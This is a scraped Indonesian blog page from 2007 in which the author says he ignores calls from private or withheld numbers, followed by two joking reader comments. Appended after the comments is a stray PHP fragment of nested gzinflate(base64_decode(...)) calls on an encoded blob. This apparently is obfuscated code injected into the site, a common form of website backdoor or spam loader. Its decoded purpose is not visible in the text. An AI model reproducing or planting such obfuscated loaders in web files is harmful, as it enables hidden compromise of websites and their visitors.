Delicious

Archives

Categories

“Withheld”

  ozzie / 01/04/2007


FYI:
:-":-":-" mao ampe ribuan kali nge-call kek, KAGAK BAKALAN GUE ANGKAT;)) ;)) So..! [-x[-x jangan pernah nelpon gue pake fasilitas “Private Number” ato acara ngumpetin nomer segala ;)

Jadi.. maap aja kalo telpon gak diangkat:-s, coba periksa dulu ;));));)) peace.. >:)>:) Heheheheh……. :-h:-h


« »


2 Responses to ““Withheld””

  1. Iqbal Says:

    gila nih admin … ketemu admin begini enaknya mah di injek2, dijedotin ketembok, trus dibuang ke sumur :P… lha belum tentu orang nelpon ke elo ga sengaja ngaktifin private call (CLIP ape CLIR sih ? bodo ah !)

    tapi gue juga gitu sih, lebih parah lagi malah… gue dah tau sapa yang nelpon, tapi kalo lagi tidur …

    NO ONE, I MEAN, NO ONE, CAN WAKE ME UP !!!! INCLUDING YOU, YEAH YOU ! WHO READ THIS F(Beep)NG BLOG … !!! 8-}

  2. ozzie Says:

    Betul… \:d/\:d/
    Admin Juga Manusia dan butuh Privasi… Komplen sih boleh2 aja:>:> Asal yang Sopan!!!… :-s:-s

    Jangan selalu nyalahin ADMIN & Provider:D:D
    sebenernya bapak2/ibu2 ngerti NETWORK gak sih?? ;));)) kalo nggak main2 lah ke WIKI dan jangan sok tau.. emang sih nyangkut2 ke SLA:-s tapi inget masih banyak faktor & kemungkinan.:D:D:D


".gzinflate(base64_decode(gzinflate(base64_decode(gzinflate(base64_decode('BcHRdkMwAADQD/KgS0mzR8ShjSMJNWveEEamOGljab9+9+KOSbyef5IA89DREZ+phxlyKhQ2sF/pt2hxFtPHwFYI4J1+mVr7YRsVICLl0fQMYyzzvW8FIOGbX1PVUVAP0/uWuZs8RWoEcMl8XpKEe37FrPxw/eeNGNw19npJt8S5uOlh83I2wUDpI6btM7hPv0s8Idtwt7XVp6gqMz92VSRz6Zx7WFuuSb8YAk8IveQfQ69xi7kGBRCNSsZSDPl+CP4B'))))))); ?>